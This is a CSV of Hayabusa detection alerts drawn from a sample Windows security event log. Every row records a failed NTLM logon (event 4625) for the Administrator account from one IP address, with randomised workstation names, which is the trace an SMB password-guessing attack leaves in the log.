2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
